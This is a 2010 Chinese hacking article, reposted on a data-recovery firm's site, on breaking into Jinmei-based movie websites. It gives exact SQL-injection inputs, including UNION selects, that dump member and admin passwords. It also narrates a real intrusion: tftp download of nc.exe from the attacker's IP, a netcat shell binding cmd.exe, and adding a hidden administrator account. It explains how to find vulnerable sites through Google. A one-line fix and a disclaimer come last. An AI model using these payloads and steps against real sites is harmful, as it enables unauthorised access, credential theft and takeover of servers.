当前位置:主页 > 数据修复 >

    SQL注入奇招致胜 UNION查询轻松免费看电影

    2010-11-11 10:24 作者:admin 来源:admin 浏览次数:

    我打开Google,随便搜索了一下电影网站,点开了一个。看了一下界面,知道和金梅电影系统关联很大。金梅系统和"洞"网(7.0安全多啦,自己想的)差不多,也是有N多漏洞,比如注入啊,COOKIE欺骗什么的。我就在X档案03年11期看过一篇文章,写的是用ASC和MID函数对系统管理员帐户进行猜测。我也想用这种方法猜测,猜了半天都没猜对,真烦人,同学还在那边等我哪,这不是很丢人。我决定找个简单的办法,还是读读源码吧!

    下载了一个金梅三电影系统,看了一下,这么多个文件,头马上大了。还是在自己电脑上运行一下吧。注册了一个用户,点了一下找回密码,别人说这里有漏洞。看了一下,象是有漏洞的界面,有三个参数,还直接把密码显示出来。好,看一下源码。

    39        <% if request("myuserid")="" then %>

    ...
     

      58   <%else

                set rs=server.createobject("adodb.recordset")

                sql="select passWord from users where userid='"&request("myuserid")&"'and city='"&request("ask")&"'and adress='"&request("answer")&"'"

                rs.open sql,conn,1,1

                if rs.eof and rs.bof then%>

    这里果然没过滤。好多人都想到了可以用上面的方法注入了。能不能有更简单的方法呢?

    我仔细考虑语句的形式如下:

    select password from users where userid=‘‘ and city=‘‘ and adress='‘

    如果用户名,密码提示问题(city),密码提示答案(adress)和表users一行匹配,便打印这行的password,而且是明文的。我想的过程就不写了,后来我想到了一种方法,就是利用union查询。access功能是很弱的,不能执行命令,不能导出文本,还不能注释。有个子查询可以利用之外,也就剩下这个 union了。


    怎么利用呢?先在本机做实验。测试过程简略,直接写有所收获的结果。


    要是知道了一个该网站的一个用户名(比如abc),可以这样利用。

    在"你注册问题"处填: abc' or  ‘1=1(如果用户名是bcd,就变为bcd' or ‘1=1)

    密码提示问题处随便填几个字母或数字,最好别有符号,容易影响结果: 比如字母a

    密码提示答案处随便填几个字母或数字,填个a

    回车后就看到该用户的密码了,简单吧(如图一)。

    其实这样一来,上面的语句就变为:
     

    select password from users where userid=‘abc'  or  ‘1=1‘ and city=‘a‘ and adress='a‘

    呵呵,程序无条件的执行了,因为被 or ‘1=1'跳过后面的验证了。

     
    可是网站用户名也不是轻易得到的啊。别急,得到用户名一样简单。如下:


    在"你注册问题"处随便处填几个字母或数字,最好别有符号,容易影响结果: 比如字母a

    密码提示问题处和上面一样,随便填:我也填个a

    关键是在密码提示答案:我填的是a' union select  userid  from users where oklook>=3 or '0

    上面就是要找黄金用户的帐户名(如图二),看到用户名后再用前面的方法找到密码。

    可以在where后面加很多参数并赋不同的值可以得到很多帐户。

    按上面的填入后输入语句就变成了:

    select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  userid  from users  where oklook>=3 or '0 ‘
     

    细心的读者看到这可能已经想到怎样得到管理员的帐号和密码,不错,也很简单。我也不写过程了,直接写出语句如下:

    得到帐号:
     
    select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  name  from okwiantgo  where  id>=1 or '0 ‘

    得到密码:

    select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  pwd  from okwiantgo  where  id>=1 or '0 ‘

     
    然后登陆就行了,路径格式为:

    http://网站电影路径/findaccout.asp?name=管理员帐号&pwd=管理员密码

    回车,很轻松就进管理界面了。(如图三)

    有时findaccount.asp可能被改名了,这时只能拿个黄金帐户了。

    这个漏洞有很多电影程序有,有的程序表名不是okwiantgo(程序会报告64行属性不对),改成admin或password.,把上面的输入稍微修改一下行了。这样一来不管是多复杂的密码,或者是中文密码都没问题。再猜管理员帐户的时候也要多,where后面的条件多变化才行,否则可能得不到超级管理员。
     

    这个漏洞使用很简单,危害极大,轻易可以得到管理员帐户。如果系统配置不当,在upload/uploadmovie.asp允许上传ASP文件,系统就很容易换主人了。我曾经成功渗透过这样一个网站,简单过程叙述如下。

    上传一个ASP程序,发现该系统运行SQLSERVER,通过读源文件看到了sa的密码,用sqlexec连接,tftp上传nc.exe。再次dir发现nc被删了,有防火强。用tftp上传nc.jpg肯定万无一失, tftp  -i 我的ip get nc.exe nc.jpg,上传成功。在sqlexec运行

    nc.jpg -l -p 99 -e  c\winnt\system32\cmd.exe

    nc想必都很熟悉了吧,上面就是再目标机器上开一个99端口监听,同时把cmd.exe重定向到这里,本地连接nc.exe  -vv 目标IP   99,得到shell,而且是管理员权限。

    输入 net user abc 123456 /add  &&  net  localgroup administrators abc /add

    添加用户成功顺便加入管理员,&&意思是前面成功后面执行。该系统开着3389,省了我好多事情。


    好了回到正题,这个漏洞存在80%以上电影程序中,在google里搜索user/wantpws.asp,打开后发现可以输入三个参数,且把密码直接显示的都有此漏洞。


    修补方法,应该对三个参数进行严格验证,而且把结果发送的到邮箱里更稳妥,有的网站是这样做的。


    总结:我写此问的目的是想说好多问题要多想多试,一个漏洞利用方法不只一种,我们要自己学会发现。入侵过程灵活多样,我们应动脑筋。大家免费看电影的同时可别搞破坏啊,任何后果与我无关。同时我也希望看到这篇文章后,网站尽快更改。

联系方式 | 收费标准 | 上门服务 | 公司简介 | 汇款账户

回天时代有限公司

杭州公司: 杭州市文三路388号钱江科技大厦10楼1016室

华东总部:上海市徐汇区漕溪北路41号汇嘉大厦12楼E室(太平洋一期12楼)

咨询热线:400-889-1122(全国),0512-66099871(苏州),021-58358765(上海),0571-88218821(杭州) 24小时热线:13524645444,案:浙ICP备06024533号